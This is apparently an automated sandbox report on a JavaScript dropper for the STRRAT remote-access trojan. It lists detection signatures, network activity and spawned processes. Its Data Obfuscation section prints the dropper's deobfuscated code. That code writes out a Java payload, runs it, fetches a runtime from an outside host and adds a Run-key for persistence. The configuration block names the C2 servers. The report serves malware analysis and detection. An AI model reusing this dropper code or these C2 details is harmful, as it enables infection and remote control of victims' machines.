Windows Analysis Report
LYDI9MoZyu.js

Overview

General Information

Sample name: LYDI9MoZyu.js
renamed because original name is a hash value
Original sample name: dd418fd6827cd6c3b3cda5f0b6f8e8e3b887d82b8ed51a3523475406e4850da7.js
Analysis ID: 1540037
MD5: 99fb9b2b5a775f8ea1ae9e4f8585d1dd
SHA1: 37bdbbe6608d8871de738c3ba3cf67dad8b71067
SHA256: dd418fd6827cd6c3b3cda5f0b6f8e8e3b887d82b8ed51a3523475406e4850da7
Tags: js, STRRAT, user-NDA0E

Detection

STRRAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: 00000000.00000002.2165270399.0000021CF9470000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
Source: LYDI9MoZyu.js ReversingLabs: Detection: 15%

Software Vulnerabilities

Source: LYDI9MoZyu.js Return value : ['"adodb.stream"']
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 2_2_02B7CB12
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 199.232.196.209 199.232.196.209
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: unknown Network traffic detected: HTTP traffic on port 58253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58143
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58264
Source: unknown Network traffic detected: HTTP traffic on port 58227 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58260
Source: unknown Network traffic detected: HTTP traffic on port 58076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58151
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 58241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58239 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58212
Source: unknown Network traffic detected: HTTP traffic on port 58233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58211
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58213
Source: unknown Network traffic detected: HTTP traffic on port 58258 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58177
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58106 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58143 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58225 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58239 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58241 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58242 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58245 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58255 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58268 version: TLS 1.2

System Summary

Source: 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CC771 2_3_156CC771
Source: LYDI9MoZyu.js Initial sample: Strings found which are bigger than 50
Source: 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal96.troj.evad.winJS@6/4@7/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\lugnisxncf.txt
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LYDI9MoZyu.js ReversingLabs: Detection: 15%
Source: javaw.exe String found in binary or memory: z-addToSubroutine
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LYDI9MoZyu.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\lugnisxncf.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\lugnisxncf.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Source: Yara match File source: 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR
Source: LYDI9MoZyu.js String : entropy: 5.62, length: 204574, content: 'd{1}FyIG5lbTQ0Ow0Kd{1}FyIGxvb{1}dUZXh0ID0gIlVFc0R{0}QlFAPkBDQD5AZ0lAPkBDcTh0{2}WdAPkBAPkBAPkBAPkBAP
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CA4D4 pushad ; retf 2_3_156CA4D5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C848B push eax; iretd 2_3_156C8495
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C8D9B push eax; ret 2_3_156C8DA5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B823FB push es; retn 0001h 2_2_02B824FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B79091 push cs; retf 2_2_02B790B1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D830 push F8026836h; retf 2_2_02B6D842
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D631 push F8026836h; retf 2_2_02B6D642
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6FC3D push F8026839h; retf 2_2_02B6FC42
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D527 push F8026836h; retf 2_2_02B6D542
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6D72C push F8026836h; retf 2_2_02B6D742
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6EC67 push F8026836h; retf 2_2_02B6EC82
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6ED67 push F8026836h; retf 2_2_02B6ED82
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B6EE6C push F8026836h; retf 2_2_02B6EE82
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADD8F7 push 00000000h; mov dword ptr [esp], esp 2_2_02ADD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADA20A push ecx; ret 2_2_02ADA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADA21B push ecx; ret 2_2_02ADA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADB3B7 push 00000000h; mov dword ptr [esp], esp 2_2_02ADB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADBB67 push 00000000h; mov dword ptr [esp], esp 2_2_02ADBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADD8E0 push 00000000h; mov dword ptr [esp], esp 2_2_02ADD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADB947 push 00000000h; mov dword ptr [esp], esp 2_2_02ADB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02ADC477 push 00000000h; mov dword ptr [esp], esp 2_2_02ADC49D
